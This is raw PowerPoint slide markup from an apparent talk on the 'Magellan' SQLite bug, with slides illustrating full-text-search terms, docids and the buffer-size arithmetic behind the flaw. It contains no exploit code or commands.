              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> 2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7492487" y="2950157"/>
            <a:ext cx="0" cy="881311"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="41719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7593881" y="3207975"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Connector 22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8038943"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8140336" y="3207975"/>
            <a:ext cx="445062" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8585398" y="295015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686790" y="3178465"/>
            <a:ext cx="789668" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>pie</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9236561" y="2937427"/>
            <a:ext cx="0" cy="881311"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="41719C"/>
            </a:solidFill>
            <a:prstDash val="sysDash"/>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9346764" y="3041335"/>
            <a:ext cx="789668" cy="639932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Docid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> 3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="Straight Connector 53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4927800" y="3935930"/>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7384426" y="3935930"/>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5700201" y="4001240"/>
            <a:ext cx="911825" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Term 2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57" name="Straight Connector 56"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="56" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6612026" y="4184077"/>
            <a:ext cx="772402" cy="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8" name="Straight Connector 57"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="56" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4927800" y="4184077"/>
            <a:ext cx="772401" cy="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7570807" y="3935808"/>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65978" y="3935808"/>
            <a:ext cx="0" cy="24691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8412040" y="4001240"/>
            <a:ext cx="911825" cy="365675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Term 3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="64" name="Straight Connector 63"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="63" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9323865" y="4183956"/>
            <a:ext cx="842114"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5" name="Straight Connector 64"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="63" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7570807" y="4183956"/>
            <a:ext cx="841233" cy="12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1788177" y="3934696"/>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720024" y="3934696"/>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2798188" y="3990240"/>
            <a:ext cx="911825" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Term 1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="50" name="Straight Connector 49"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="49" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3710013" y="4174906"/>
            <a:ext cx="1010011" cy="917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1" name="Straight Connector 50"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="49" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1788177" y="4174906"/>
            <a:ext cx="1010011" cy="917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a:off x="8880460" y="4385608"/>
            <a:ext cx="0" cy="78869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6518873" y="5160778"/>
            <a:ext cx="4723173" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Apple + pie = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Applepie</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334538062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3710" y="2727067"/>
            <a:ext cx="5331279" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Analyzing the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bug</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31750" name="Picture 6" descr="https://ya-webdesign.com/images/caterpillar-butterfly-icon-png-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989" y="1116547"/>
            <a:ext cx="4876800" cy="4876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278288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smtClean="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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36796375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smtClean="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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="339692" y="1611765"/>
            <a:ext cx="4048125" cy="4810125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="494524" y="1828570"/>
            <a:ext cx="3893293" cy="4301866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx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Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="494524" y="6142355"/>
            <a:ext cx="3893293" cy="21179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3558346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4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345233" y="1427586"/>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
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5178490" y="1564370"/>
            <a:ext cx="4413379" cy="255100"/>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Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186615" y="4486822"/>
            <a:ext cx="1110341" cy="444796"/>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NULL</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>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0)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18285262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274676" y="3066515"/>
            <a:ext cx="4967545" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Magellan Bug</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="magellanì ëí ì´ë¯¸ì§ ê²ìê²°ê³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9618" y="1024760"/>
            <a:ext cx="4713889" cy="47138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533412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4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1436913" y="1427586"/>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
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22"/>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0)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186615" y="4486822"/>
            <a:ext cx="1110341" cy="444796"/>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NULL</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5178490" y="1816297"/>
            <a:ext cx="4413379" cy="255100"/>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02645058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4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2976469" y="1427586"/>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
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186615" y="4486822"/>
            <a:ext cx="1110341" cy="444796"/>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NULL</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241040" y="5230201"/>
            <a:ext cx="4750837" cy="974759"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>0 + 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>0 ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25"/>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0)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Elbow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1568710" y="4559566"/>
            <a:ext cx="828089" cy="587828"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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178490" y="2534757"/>
            <a:ext cx="4693298" cy="255100"/>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53941998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2" name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345232" y="4125446"/>
            <a:ext cx="4393151"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>realloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( (0 + 5) × 2 )</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5178489" y="2805342"/>
            <a:ext cx="5663681" cy="1701344"/>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Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167947" y="4524146"/>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00" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2976469" y="1427586"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60863602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2" name="Rectangle 21"/>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0x10)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5178489" y="2805342"/>
            <a:ext cx="5663681" cy="1701344"/>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Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167947" y="4524146"/>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00" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2976469" y="1427586"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196783985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2" name="Rectangle 21"/>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0x10)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167947" y="4524146"/>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apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2976469" y="1427586"/>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
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5178489" y="5707176"/>
            <a:ext cx="5215813" cy="273746"/>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59911032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4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345233" y="3610949"/>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
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5178490" y="1564370"/>
            <a:ext cx="4413379" cy="255100"/>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0x10)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167947" y="4524146"/>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apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="268319814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5" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5178490" y="1816297"/>
            <a:ext cx="4413379" cy="255100"/>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Rectangle 21"/>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0x10)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167947" y="4524146"/>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apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1436913" y="3610949"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428845277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2" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241040" y="5230201"/>
            <a:ext cx="4750837" cy="974759"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>5 + 0x10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>0x10 ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Elbow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1568710" y="4559566"/>
            <a:ext cx="828089" cy="587828"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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178490" y="2534757"/>
            <a:ext cx="4693298" cy="255100"/>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0x10)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167947" y="4524146"/>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apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
